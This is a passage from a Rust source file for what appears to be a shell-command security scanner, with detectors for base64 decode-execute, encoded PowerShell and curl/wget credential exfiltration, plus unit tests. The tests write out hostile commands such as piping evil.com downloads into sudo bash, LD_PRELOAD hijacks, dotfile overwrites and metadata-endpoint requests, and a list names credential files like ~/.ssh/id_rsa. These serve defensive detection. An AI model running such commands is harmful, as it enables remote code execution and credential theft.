2115                                    mitre_id: None,
2116                                    custom_rule_id: None,
2117                                });
2118                            }
2119                        }
2120                    }
2121                }
2122            }
2123        }
2124
2125        // Also check: something piped to base64 -d piped to interpreter
2126        // e.g. echo X | base64 -d | bash — base64 is mid-chain
2127        if i >= 1 {
2128            if let Some(ref sep) = seg.preceding_separator {
2129                if sep == "|" || sep == "|&" {
2130                    if let Some(ref cmd) = seg.command {
2131                        let cmd_base = normalize_cmd_base(cmd, shell);
2132                        if cmd_base == "base64" {
2133                            let has_decode = seg.args.iter().any(|arg| {
2134                                let norm = normalize_shell_token(arg, shell);
2135                                matches!(norm.as_str(), "-d" | "--decode" | "-D")
2136                            });
2137                            if has_decode {
2138                                if let Some(next_seg) = segments.get(i + 1) {
2139                                    if let Some(ref next_sep) = next_seg.preceding_separator {
2140                                        if (next_sep == "|" || next_sep == "|&")
2141                                            && resolve_interpreter_name(next_seg, shell).is_some()
2142                                        {
2143                                            // Only fire if we didn't already fire above (when i was the base64 segment)
2144                                            let already_found = findings
2145                                                .iter()
2146                                                .any(|f| f.rule_id == RuleId::Base64DecodeExecute);
2147                                            if !already_found {
2148                                                findings.push(Finding {
2149                                                    rule_id: RuleId::Base64DecodeExecute,
2150                                                    severity: Severity::High,
2151                                                    title: "Base64 decode piped to interpreter".to_string(),
2152                                                    description: "Command decodes base64 content and pipes it directly to an interpreter for execution".to_string(),
2153                                                    evidence: vec![Evidence::CommandPattern {
2154                                                        pattern: "base64 decode | interpreter".to_string(),
2155                                                        matched: redact::redact_shell_assignments(&format!(
2156                                                            "{} | {}", seg.raw, next_seg.raw
2157                                                        )),
2158                                                    }],
2159                                                    human_view: None,
2160                                                    agent_view: None,
2161                                                    mitre_id: None,
2162                                                    custom_rule_id: None,
2163                                                });
2164                                            }
2165                                        }
2166                                    }
2167                                }
2168                            }
2169                        }
2170                    }
2171                }
2172            }
2173        }
2174    }
2175
2176    // Pattern B: Inline decode-execute — interpreter -c/-e with decode+execute tokens
2177    // Uses resolve_interpreter_name to handle wrappers (sudo, env, command, nohup, exec)
2178    for seg in segments {
2179        // Resolve through wrappers: sudo python → python, env node → node
2180        let interpreter = if let Some(ref cmd) = seg.command {
2181            let cmd_base = normalize_cmd_base(cmd, shell);
2182            if is_interpreter(&cmd_base) {
2183                Some(cmd_base)
2184            } else {
2185                resolve_interpreter_name(seg, shell)
2186            }
2187        } else {
2188            None
2189        };
2190
2191        if let Some(interp) = interpreter {
2192            // Check ALL args (including wrapper args) for -c/-e and decode+execute tokens
2193            let has_exec_flag = seg.args.iter().any(|arg| {
2194                let norm = normalize_shell_token(arg, shell);
2195                norm == "-c" || norm == "-e"
2196            });
2197            if has_exec_flag {
2198                let args_joined = seg.args.join(" ");
2199                let lower = args_joined.to_lowercase();
2200                let has_decode_exec = (lower.contains("b64decode") && lower.contains("exec"))
2201                    || (lower.contains("atob") && lower.contains("eval"))
2202                    || (lower.contains("buffer.from") && lower.contains("eval"));
2203                if has_decode_exec {
2204                    findings.push(Finding {
2205                        rule_id: RuleId::Base64DecodeExecute,
2206                        severity: Severity::High,
2207                        title: "Inline base64 decode-execute".to_string(),
2208                        description: format!(
2209                            "Interpreter '{interp}' executes code with base64 decode and eval/exec co-occurrence"
2210                        ),
2211                        evidence: vec![Evidence::CommandPattern {
2212                            pattern: "interpreter -c/e with decode+execute".to_string(),
2213                            matched: redact::redact_shell_assignments(&seg.raw),
2214                        }],
2215                        human_view: None,
2216                        agent_view: None,
2217                        mitre_id: None,
2218                        custom_rule_id: None,
2219                    });
2220                }
2221            }
2222        }
2223    }
2224
2225    // Pattern C: PowerShell -EncodedCommand / -enc / -ec
2226    for seg in segments {
2227        if let Some(ref cmd) = seg.command {
2228            let cmd_base = normalize_cmd_base(cmd, shell);
2229            if cmd_base == "powershell" || cmd_base == "pwsh" {
2230                let has_enc_flag = seg.args.iter().any(|arg| {
2231                    let norm = normalize_shell_token(arg, shell);
2232                    let lower = norm.to_lowercase();
2233                    lower == "-encodedcommand" || lower == "-enc" || lower == "-ec"
2234                });
2235                if has_enc_flag {
2236                    findings.push(Finding {
2237                        rule_id: RuleId::Base64DecodeExecute,
2238                        severity: Severity::High,
2239                        title: "PowerShell encoded command".to_string(),
2240                        description: format!(
2241                            "PowerShell ({cmd_base}) invoked with -EncodedCommand, executing base64-encoded script"
2242                        ),
2243                        evidence: vec![Evidence::CommandPattern {
2244                            pattern: "powershell -EncodedCommand".to_string(),
2245                            matched: redact::redact_shell_assignments(&seg.raw),
2246                        }],
2247                        human_view: None,
2248                        agent_view: None,
2249                        mitre_id: None,
2250                        custom_rule_id: None,
2251                    });
2252                }
2253            }
2254        }
2255    }
2256}
2257
2258// ---------------------------------------------------------------------------
2259// Data exfiltration detection (POSIX + Fish: curl/wget upload of sensitive data)
2260// ---------------------------------------------------------------------------
2261
2262/// Sensitive file paths for data exfiltration detection.
2263const SENSITIVE_PATHS: &[&str] = &[
2264    "/etc/passwd",
2265    "/etc/shadow",
2266    "~/.ssh/id_rsa",
2267    "~/.ssh/id_ed25519",
2268    "~/.ssh/id_ecdsa",
2269    "~/.ssh/id_dsa",
2270    "~/.aws/credentials",
2271    "~/.kube/config",
2272    "~/.docker/config.json",
2273    "~/.gnupg/",
2274    "~/.netrc",
2275    "~/.git-credentials",
2276];
2277
2278fn is_sensitive_file_ref(value: &str) -> bool {
2279    let v = value.trim_start_matches('@');
2280    SENSITIVE_PATHS.iter().any(|p| v.contains(p))
2281}
2282
2283fn has_sensitive_env_ref(value: &str) -> bool {
2284    use crate::rules::shared::SENSITIVE_KEY_VARS;
2285    for var in SENSITIVE_KEY_VARS {
2286        // $VAR or ${VAR}
2287        if value.contains(&format!("${var}")) || value.contains(&format!("${{{var}}}")) {
2288            return true;
2289        }
2290    }
2291    false
2292}
2293
2294fn has_sensitive_cmd_substitution(value: &str) -> bool {
2295    // Check for $(cmd) with sensitive paths — no backtick detection (PowerShell conflict)
2296    if let Some(start) = value.find("$(") {
2297        let rest = &value[start..];
2298        return SENSITIVE_PATHS.iter().any(|p| rest.contains(p));
2299    }
2300    false
2301}
2302
2303fn check_data_exfiltration(
2304    segments: &[tokenize::Segment],
2305    shell: ShellType,
2306    findings: &mut Vec<Finding>,
2307) {
2308    for seg in segments {
2309        let Some(ref cmd) = seg.command else {
2310            continue;
2311        };
2312        let cmd_base = normalize_cmd_base(cmd, shell);
2313
2314        match cmd_base.as_str() {
2315            "curl" => check_curl_exfiltration(seg, shell, findings),
2316            "wget" => check_wget_exfiltration(seg, shell, findings),
2317            _ => {}
2318        }
2319    }
2320}
2321
2322fn check_curl_exfiltration(seg: &tokenize::Segment, shell: ShellType, findings: &mut Vec<Finding>) {
2323    let args = &seg.args;
2324    let mut i = 0;
2325    while i < args.len() {
2326        let norm = normalize_shell_token(&args[i], shell);
2327
2328        // -d / --data / --data-binary / --data-raw / --data-urlencode
2329        let is_data_flag =
2330            norm == "-d" || norm.starts_with("--data") || norm.starts_with("-d") && norm.len() > 2; // combined form -dVAL
2331
2332        // -F / --form
2333        let is_form_flag =
2334            norm == "-F" || norm.starts_with("--form") || norm.starts_with("-F") && norm.len() > 2;
2335
2336        // -T / --upload-file
2337        let is_upload_flag = norm == "-T" || norm.starts_with("--upload-file");
2338
2339        if is_data_flag || is_form_flag || is_upload_flag {
2340            // Get the value: either from =VAL, combined form, or next arg
2341            let value = if let Some(eq_pos) = norm.find('=') {
2342                Some(norm[eq_pos + 1..].to_string())
2343            } else if (norm == "-d"
2344                || norm == "-F"
2345                || norm == "-T"
2346                || norm == "--data"
2347                || norm == "--data-binary"
2348                || norm == "--data-raw"
2349                || norm == "--data-urlencode"
2350                || norm == "--form"
2351                || norm == "--upload-file")
2352                && i + 1 < args.len()
2353            {
2354                i += 1;
2355                Some(normalize_shell_token(&args[i], shell))
2356            } else if norm.starts_with("-d") && norm.len() > 2 {
2357                // Combined -dVAL
2358                Some(norm[2..].to_string())
2359            } else if norm.starts_with("-F") && norm.len() > 2 {
2360                // Combined -FVAL
2361                Some(norm[2..].to_string())
2362            } else {
2363                None
2364            };
2365
2366            if let Some(val) = value {
2367                let is_sensitive = if is_upload_flag {
2368                    // -T uses direct file paths (no @)
2369                    SENSITIVE_PATHS.iter().any(|p| val.contains(p))
2370                } else {
2371                    is_sensitive_file_ref(&val)
2372                        || has_sensitive_env_ref(&val)
2373                        || has_sensitive_cmd_substitution(&val)
2374                };
2375
2376                if is_sensitive {
2377                    findings.push(Finding {
2378                        rule_id: RuleId::DataExfiltration,
2379                        severity: Severity::High,
2380                        title: "Data exfiltration via curl upload".to_string(),
2381                        description: "curl command uploads sensitive data (credentials, keys, or private files) to a remote server".to_string(),
2382                        evidence: vec![Evidence::CommandPattern {
2383                            pattern: "curl upload sensitive data".to_string(),
2384                            matched: redact::redact_shell_assignments(&seg.raw),
2385                        }],
2386                        human_view: None,
2387                        agent_view: None,
2388                        mitre_id: None,
2389                        custom_rule_id: None,
2390                    });
2391                    return; // One finding per segment
2392                }
2393            }
2394        }
2395        i += 1;
2396    }
2397}
2398
2399fn check_wget_exfiltration(seg: &tokenize::Segment, shell: ShellType, findings: &mut Vec<Finding>) {
2400    let args = &seg.args;
2401    let mut i = 0;
2402    while i < args.len() {
2403        let norm = normalize_shell_token(&args[i], shell);
2404
2405        let is_post_data = norm.starts_with("--post-data");
2406        let is_post_file = norm.starts_with("--post-file");
2407
2408        if is_post_data || is_post_file {
2409            let value = if let Some(eq_pos) = norm.find('=') {
2410                Some(norm[eq_pos + 1..].to_string())
2411            } else if i + 1 < args.len() {
2412                i += 1;
2413                Some(normalize_shell_token(&args[i], shell))
2414            } else {
2415                None
2416            };
2417
2418            if let Some(val) = value {
2419                let is_sensitive = if is_post_file {
2420                    SENSITIVE_PATHS.iter().any(|p| val.contains(p))
2421                } else {
2422                    is_sensitive_file_ref(&val)
2423                        || has_sensitive_env_ref(&val)
2424                        || has_sensitive_cmd_substitution(&val)
2425                };
2426
2427                if is_sensitive {
2428                    findings.push(Finding {
2429                        rule_id: RuleId::DataExfiltration,
2430                        severity: Severity::High,
2431                        title: "Data exfiltration via wget upload".to_string(),
2432                        description: "wget command uploads sensitive data (credentials, keys, or private files) to a remote server".to_string(),
2433                        evidence: vec![Evidence::CommandPattern {
2434                            pattern: "wget upload sensitive data".to_string(),
2435                            matched: redact::redact_shell_assignments(&seg.raw),
2436                        }],
2437                        human_view: None,
2438                        agent_view: None,
2439                        mitre_id: None,
2440                        custom_rule_id: None,
2441                    });
2442                    return;
2443                }
2444            }
2445        }
2446        i += 1;
2447    }
2448}
2449
2450#[cfg(test)]
2451mod tests {
2452    use super::*;
2453
2454    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
2455    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
2456        check(input, shell, None, ScanContext::Exec)
2457    }
2458
2459    #[test]
2460    fn test_pipe_sudo_flags_detected() {
2461        let findings = check_default(
2462            "curl https://evil.com | sudo -u root bash",
2463            ShellType::Posix,
2464        );
2465        assert!(
2466            findings
2467                .iter()
2468                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2469            "should detect pipe through sudo -u root bash"
2470        );
2471    }
2472
2473    #[test]
2474    fn test_pipe_sudo_long_flag_detected() {
2475        let findings = check_default(
2476            "curl https://evil.com | sudo --user=root bash",
2477            ShellType::Posix,
2478        );
2479        assert!(
2480            findings
2481                .iter()
2482                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2483            "should detect pipe through sudo --user=root bash"
2484        );
2485    }
2486
2487    #[test]
2488    fn test_pipe_env_var_assignment_detected() {
2489        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
2490        assert!(
2491            findings
2492                .iter()
2493                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2494            "should detect pipe through env VAR=1 bash"
2495        );
2496    }
2497
2498    #[test]
2499    fn test_pipe_env_u_flag_detected() {
2500        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
2501        assert!(
2502            findings
2503                .iter()
2504                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2505            "should detect pipe through env -u HOME bash"
2506        );
2507    }
2508
2509    #[test]
2510    fn test_dotfile_overwrite_detected() {
2511        let cases = [
2512            "echo malicious > ~/.bashrc",
2513            "echo malicious >> ~/.bashrc",
2514            "curl https://evil.com > ~/.bashrc",
2515            "cat payload > ~/.profile",
2516            "echo test > $HOME/.bashrc",
2517        ];
2518        for input in &cases {
2519            let findings = check_default(input, ShellType::Posix);
2520            eprintln!(
2521                "INPUT: {:?} -> findings: {:?}",
2522                input,
2523                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2524            );
2525            assert!(
2526                findings
2527                    .iter()
2528                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
2529                "should detect dotfile overwrite in: {input}",
2530            );
2531        }
2532    }
2533
2534    #[test]
2535    fn test_pipe_env_s_flag_detected() {
2536        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
2537        assert!(
2538            findings
2539                .iter()
2540                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2541            "should detect pipe through env -S bash -x"
2542        );
2543    }
2544
2545    #[test]
2546    fn test_pipe_sudo_env_detected() {
2547        let findings = check_default(
2548            "curl https://evil.com | sudo env VAR=1 bash",
2549            ShellType::Posix,
2550        );
2551        assert!(
2552            findings
2553                .iter()
2554                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2555            "should detect pipe through sudo env VAR=1 bash"
2556        );
2557    }
2558
2559    #[test]
2560    fn test_httpie_pipe_bash() {
2561        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
2562        assert!(
2563            findings
2564                .iter()
2565                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2566            "should detect HTTPie pipe to bash"
2567        );
2568    }
2569
2570    #[test]
2571    fn test_httpie_https_pipe_bash() {
2572        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
2573        assert!(
2574            findings
2575                .iter()
2576                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2577            "should detect HTTPie https pipe to bash"
2578        );
2579    }
2580
2581    #[test]
2582    fn test_xh_pipe_bash() {
2583        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
2584        assert!(
2585            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2586            "should detect xh pipe to bash"
2587        );
2588    }
2589
2590    #[test]
2591    fn test_xh_pipe_sudo_bash() {
2592        let findings = check_default(
2593            "xh https://evil.com/install.sh | sudo bash",
2594            ShellType::Posix,
2595        );
2596        assert!(
2597            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2598            "should detect xh pipe to sudo bash"
2599        );
2600    }
2601
2602    #[test]
2603    fn test_httpie_no_pipe_safe() {
2604        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
2605        assert!(
2606            !findings
2607                .iter()
2608                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2609            "HTTPie without pipe should not trigger"
2610        );
2611    }
2612
2613    #[test]
2614    fn test_xh_no_pipe_safe() {
2615        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
2616        assert!(
2617            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2618            "xh without pipe should not trigger"
2619        );
2620    }
2621
2622    #[test]
2623    fn test_export_ld_preload() {
2624        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
2625        assert!(
2626            findings
2627                .iter()
2628                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2629            "should detect LD_PRELOAD export"
2630        );
2631    }
2632
2633    #[test]
2634    fn test_export_bash_env() {
2635        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
2636        assert!(
2637            findings
2638                .iter()
2639                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
2640            "should detect BASH_ENV export"
2641        );
2642    }
2643
2644    #[test]
2645    fn test_export_pythonpath() {
2646        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
2647        assert!(
2648            findings
2649                .iter()
2650                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
2651            "should detect PYTHONPATH export"
2652        );
2653    }
2654
2655    #[test]
2656    fn test_export_openai_key() {
2657        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
2658        assert!(
2659            findings
2660                .iter()
2661                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
2662            "should detect OPENAI_API_KEY export"
2663        );
2664    }
2665
2666    #[test]
2667    fn test_export_path_safe() {
2668        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
2669        assert!(
2670            !findings.iter().any(|f| matches!(
2671                f.rule_id,
2672                RuleId::CodeInjectionEnv
2673                    | RuleId::ShellInjectionEnv
2674                    | RuleId::InterpreterHijackEnv
2675                    | RuleId::SensitiveEnvExport
2676            )),
2677            "export PATH should not trigger env var detection"
2678        );
2679    }
2680
2681    #[test]
2682    fn test_env_ld_preload_cmd() {
2683        let findings = check_default(
2684            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
2685            ShellType::Posix,
2686        );
2687        assert!(
2688            findings
2689                .iter()
2690                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2691            "should detect LD_PRELOAD via env command"
2692        );
2693    }
2694
2695    #[test]
2696    fn test_curl_metadata_endpoint() {
2697        let findings = check_default(
2698            "curl http://169.254.169.254/latest/meta-data",
2699            ShellType::Posix,
2700        );
2701        assert!(
2702            findings
2703                .iter()
2704                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2705            "should detect AWS metadata endpoint"
2706        );
2707    }
2708
2709    #[test]
2710    fn test_curl_private_network() {
2711        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
2712        assert!(
2713            findings
2714                .iter()
2715                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2716            "should detect private network access"
2717        );
2718    }
2719
2720    #[test]
2721    fn test_curl_public_ip_safe() {
2722        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
2723        assert!(
2724            !findings.iter().any(|f| matches!(
2725                f.rule_id,
2726                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
2727            )),
2728            "public IP should not trigger network destination detection"
2729        );
2730    }
2731
2732    #[test]
2733    fn test_metadata_bare_ip() {
2734        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
2735        assert!(
2736            findings
2737                .iter()
2738                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2739            "should detect bare IP metadata endpoint"
2740        );
2741    }
2742
2743    #[test]
2744    fn test_extract_host_from_url() {
2745        assert_eq!(
2746            extract_host_from_arg("http://169.254.169.254/latest"),
2747            Some("169.254.169.254".to_string())
2748        );
2749        assert_eq!(
2750            extract_host_from_arg("http://10.0.0.1:8080/api"),
2751            Some("10.0.0.1".to_string())
2752        );
2753        assert_eq!(
2754            extract_host_from_arg("169.254.169.254/path"),
2755            Some("169.254.169.254".to_string())
2756        );
2757        assert_eq!(
2758            extract_host_from_arg("8.8.8.8"),
2759            Some("8.8.8.8".to_string())
2760        );
2761        assert_eq!(extract_host_from_arg("-H"), None);
2762        assert_eq!(extract_host_from_arg("output.txt"), None);
2763    }
2764
2765    // --- Network policy tests ---
2766
2767    #[test]
2768    fn test_network_policy_deny_exact() {
2769        let deny = vec!["evil.com".to_string()];
2770        let allow = vec![];
2771        let findings = check_network_policy(
2772            "curl https://evil.com/data",
2773            ShellType::Posix,
2774            &deny,
2775            &allow,
2776        );
2777        assert_eq!(findings.len(), 1);
2778        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2779    }
2780
2781    #[test]
2782    fn test_network_policy_deny_subdomain() {
2783        let deny = vec!["evil.com".to_string()];
2784        let allow = vec![];
2785        let findings = check_network_policy(
2786            "wget https://sub.evil.com/data",
2787            ShellType::Posix,
2788            &deny,
2789            &allow,
2790        );
2791        assert_eq!(findings.len(), 1);
2792        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2793    }
2794
2795    #[test]
2796    fn test_network_policy_deny_cidr() {
2797        let deny = vec!["10.0.0.0/8".to_string()];
2798        let allow = vec![];
2799        let findings =
2800            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
2801        assert_eq!(findings.len(), 1);
2802        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2803    }
2804
2805    #[test]
2806    fn test_network_policy_allow_exempts() {
2807        let deny = vec!["evil.com".to_string()];
2808        let allow = vec!["safe.evil.com".to_string()];
2809        let findings = check_network_policy(
2810            "curl https://safe.evil.com/data",
2811            ShellType::Posix,
2812            &deny,
2813            &allow,
2814        );
2815        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
2816    }
2817
2818    #[test]
2819    fn test_network_policy_no_match() {
2820        let deny = vec!["evil.com".to_string()];
2821        let allow = vec![];
2822        let findings = check_network_policy(
2823            "curl https://example.com/data",
2824            ShellType::Posix,
2825            &deny,
2826            &allow,
2827        );
2828        assert_eq!(findings.len(), 0);
2829    }
2830
2831    #[test]
2832    fn test_network_policy_empty_deny() {
2833        let deny = vec![];
2834        let allow = vec![];
2835        let findings =
2836            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
2837        assert_eq!(
2838            findings.len(),
2839            0,
2840            "empty deny list should produce no findings"
2841        );
2842    }
2843
2844    #[test]
2845    fn test_cidr_contains() {
2846        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
2847        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
2848        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
2849        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
2850        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
2851        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
2852        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
2853    }
2854
2855    #[test]
2856    fn test_matches_network_list_hostname() {
2857        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
2858        assert!(matches_network_list("evil.com", &list));
2859        assert!(matches_network_list("sub.evil.com", &list));
2860        assert!(!matches_network_list("notevil.com", &list));
2861        assert!(!matches_network_list("good.com", &list));
2862    }
2863
2864    #[test]
2865    fn test_flag_value_url_detected_in_network_policy() {
2866        let deny = vec!["evil.com".to_string()];
2867        let allow = vec![];
2868        let findings = check_network_policy(
2869            "curl --url=http://evil.com/data",
2870            ShellType::Posix,
2871            &deny,
2872            &allow,
2873        );
2874        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
2875        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2876    }
2877
2878    #[test]
2879    fn test_flag_value_url_metadata_endpoint() {
2880        let findings = check(
2881            "curl --url=http://169.254.169.254/latest/meta-data",
2882            ShellType::Posix,
2883            None,
2884            ScanContext::Exec,
2885        );
2886        assert!(
2887            findings
2888                .iter()
2889                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2890            "should detect metadata endpoint in --flag=URL"
2891        );
2892    }
2893
2894    #[test]
2895    fn test_flag_value_url_private_network() {
2896        let findings = check(
2897            "curl --url=http://10.0.0.1/internal",
2898            ShellType::Posix,
2899            None,
2900            ScanContext::Exec,
2901        );
2902        assert!(
2903            findings
2904                .iter()
2905                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2906            "should detect private network in --flag=URL"
2907        );
2908    }
2909
2910    #[test]
2911    fn test_strip_port_unbracketed_ipv6() {
2912        assert_eq!(strip_port("fe80::1"), "fe80::1");
2913    }
2914
2915    #[test]
2916    fn test_vet_not_configured_fires_without_supply_chain() {
2917        let dir = tempfile::tempdir().unwrap();
2918        let cwd = dir.path().to_str().unwrap();
2919        let findings = check(
2920            "cargo install serde_json",
2921            ShellType::Posix,
2922            Some(cwd),
2923            ScanContext::Exec,
2924        );
2925        assert!(findings
2926            .iter()
2927            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2928    }
2929
2930    #[test]
2931    fn test_vet_not_configured_suppressed_with_supply_chain() {
2932        let dir = tempfile::tempdir().unwrap();
2933        let sc_dir = dir.path().join("supply-chain");
2934        std::fs::create_dir_all(&sc_dir).unwrap();
2935        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
2936        let cwd = dir.path().to_str().unwrap();
2937        let findings = check(
2938            "cargo install serde_json",
2939            ShellType::Posix,
2940            Some(cwd),
2941            ScanContext::Exec,
2942        );
2943        assert!(!findings
2944            .iter()
2945            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2946    }
2947
2948    #[test]
2949    fn test_vet_not_configured_skips_non_install() {
2950        let dir = tempfile::tempdir().unwrap();
2951        let cwd = dir.path().to_str().unwrap();
2952        let findings = check(
2953            "cargo build",
2954            ShellType::Posix,
2955            Some(cwd),
2956            ScanContext::Exec,
2957        );
2958        assert!(!findings
2959            .iter()
2960            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2961    }
2962
2963    #[test]
2964    fn test_vet_detects_cargo_with_flags() {
2965        let dir = tempfile::tempdir().unwrap();
2966        let cwd = dir.path().to_str().unwrap();
2967        let f1 = check(
2968            "cargo --locked install serde",
2969            ShellType::Posix,
2970            Some(cwd),
2971            ScanContext::Exec,
2972        );
2973        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2974        let f2 = check(
2975            "cargo +nightly add tokio",
2976            ShellType::Posix,
2977            Some(cwd),
2978            ScanContext::Exec,
2979        );
2980        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2981        let f3 = check(
2982            "cargo -Z sparse-registry install serde",
2983            ShellType::Posix,
2984            Some(cwd),
2985            ScanContext::Exec,
2986        );
2987        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2988    }
2989
2990    #[test]
2991    fn test_vet_skipped_in_paste_context() {
2992        let dir = tempfile::tempdir().unwrap();
2993        let cwd = dir.path().to_str().unwrap();
2994        let findings = check(
2995            "cargo install serde_json",
2996            ShellType::Posix,
2997            Some(cwd),
2998            ScanContext::Paste,
2999        );
3000        assert!(!findings
3001            .iter()
3002            .any(|f| f.rule_id == RuleId::VetNotConfigured));
3003    }
3004
3005    #[test]
3006    fn test_vet_no_false_positive_on_non_install_subcommand() {
3007        let dir = tempfile::tempdir().unwrap();
3008        let cwd = dir.path().to_str().unwrap();
3009        let f1 = check(
3010            "cargo test --package add",
3011            ShellType::Posix,
3012            Some(cwd),
3013            ScanContext::Exec,
3014        );
3015        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
3016        let f2 = check(
3017            "cargo build install",
3018            ShellType::Posix,
3019            Some(cwd),
3020            ScanContext::Exec,
3021        );
3022        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
3023    }
3024
3025    #[test]
3026    fn test_vet_detects_cargo_exe_windows_path() {
3027        let dir = tempfile::tempdir().unwrap();
3028        let cwd = dir.path().to_str().unwrap();
3029        let f1 = check(
3030            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
3031            ShellType::PowerShell,
3032            Some(cwd),
3033            ScanContext::Exec,
3034        );
3035        assert!(
3036            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
3037            "should detect cargo.exe with Windows backslash path"
3038        );
3039        let f2 = check(
3040            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
3041            ShellType::PowerShell,
3042            Some(cwd),
3043            ScanContext::Exec,
3044        );
3045        assert!(
3046            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
3047            "should detect CARGO.EXE case-insensitively"
3048        );
3049    }
3050
3051    // ── normalize_shell_token unit tests ──
3052
3053    #[test]
3054    fn test_normalize_ansi_c_basic() {
3055        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3056    }
3057
3058    #[test]
3059    fn test_normalize_ansi_c_hex() {
3060        assert_eq!(
3061            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
3062            "bash"
3063        );
3064    }
3065
3066    #[test]
3067    fn test_normalize_ansi_c_octal() {
3068        assert_eq!(
3069            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
3070            "bash"
3071        );
3072    }
3073
3074    #[test]
3075    fn test_normalize_ansi_c_octal_leading_zero() {
3076        // \057 = '/' (octal 057 = 47 decimal = '/')
3077        assert_eq!(
3078            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
3079            "/bin/bash"
3080        );
3081    }
3082
3083    #[test]
3084    fn test_normalize_ansi_c_bare_zero() {
3085        // \0 alone (no following octal digits) should still be NUL
3086        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
3087    }
3088
3089    #[test]
3090    fn test_normalize_ansi_c_unicode() {
3091        assert_eq!(
3092            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
3093            "bash"
3094        );
3095    }
3096
3097    #[test]
3098    fn test_normalize_double_quotes() {
3099        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
3100    }
3101
3102    #[test]
3103    fn test_normalize_cmd_caret_inside_double_quotes() {
3104        assert_eq!(normalize_shell_token("\"c^md\"", ShellType::Cmd), "cmd");
3105    }
3106
3107    #[test]
3108    fn test_normalize_single_quotes() {
3109        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
3110    }
3111
3112    #[test]
